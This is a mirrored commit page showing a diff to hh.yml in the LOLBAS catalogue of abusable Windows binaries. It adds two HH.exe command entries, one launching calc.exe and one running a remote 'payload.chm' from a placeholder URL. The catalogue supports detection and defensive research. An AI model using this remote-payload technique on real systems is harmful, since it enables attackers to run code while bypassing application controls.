mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 06:49:09 +01:00
Fixing issue with hh.yml
This commit is contained in:
parent
089614e6a9
commit
b46fc3f8c2
@ -14,6 +14,8 @@ Commands:
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Application: GUI
|
||||
- Command: HH.exe c:\windows\system32\calc.exe
|
||||
Description: Executes calc.exe with HTML Help.
|
||||
Usecase: Execute process with HH.exe
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
@ -22,6 +24,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Application: GUI
|
||||
- Command: HH.exe http://some.url/payload.chm
|
||||
Description: Executes a remote payload.chm file which can contain commands.
|
||||
Usecase: Execute commands with HH.exe
|
||||
Category: Execute
|
||||
|
Loading…
Reference in New Issue
Block a user